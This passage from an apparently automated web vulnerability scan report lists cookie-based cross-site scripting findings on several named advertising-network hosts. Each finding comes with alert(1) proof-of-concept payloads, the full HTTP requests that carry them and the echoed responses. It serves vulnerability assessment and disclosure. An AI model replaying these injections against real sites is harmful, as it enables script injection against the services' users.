User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
r 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&27999<script>alert(1)</script>2c482b2dc1b', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...
3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 987b0<script>alert(1)</script>64c88d49c21 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&987b0<script>alert(1)</script>64c88d49c21=&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&987b0<script>alert(1)</script>64c88d49c21', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...
3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 8ad1e<script>alert(1)</script>5447c5c1a44 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=18ad1e<script>alert(1)</script>5447c5c1a44; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '18ad1e<script>alert(1)</script>5447c5c1a44', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...
3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55fbe'%3balert(1)//18254b478a was submitted in the cli cookie. This input was echoed as 55fbe';alert(1)//18254b478a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e55fbe'%3balert(1)//18254b478a; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-13247778_1304949579","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune&size=300x600&imp_id=cm-13247778_1304949579,11f8f328940989e55fbe';alert(1)//18254b478a&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.tribune%2Fuscell_ldev_300x600_05311%3Bnet
...[SNIP]...
3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13d37"%3balert(1)//7538a7cb6f was submitted in the cli cookie. This input was echoed as 13d37";alert(1)//7538a7cb6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e13d37"%3balert(1)//7538a7cb6f; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:39 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:39 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:39 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:39 GMT
Content-Length: 8188

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989e13d37";alert(1)//7538a7cb6f&seg_code=noseg&ord=1304949579",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...
3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2652a"-alert(1)-"89c34a552b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=2652a"-alert(1)-"89c34a552b; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64501; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949898^1304949898&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2652a"-alert(1)-"89c34a552b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 838c4"-alert(1)-"8edc9ca69b8 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=838c4"-alert(1)-"8edc9ca69b8; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64624; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949775^1304949775; expires=Mon, 16-May-2011 14:02:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=838c4"-alert(1)-"8edc9ca69b8\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9893"-alert(1)-"9508af4cd35 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
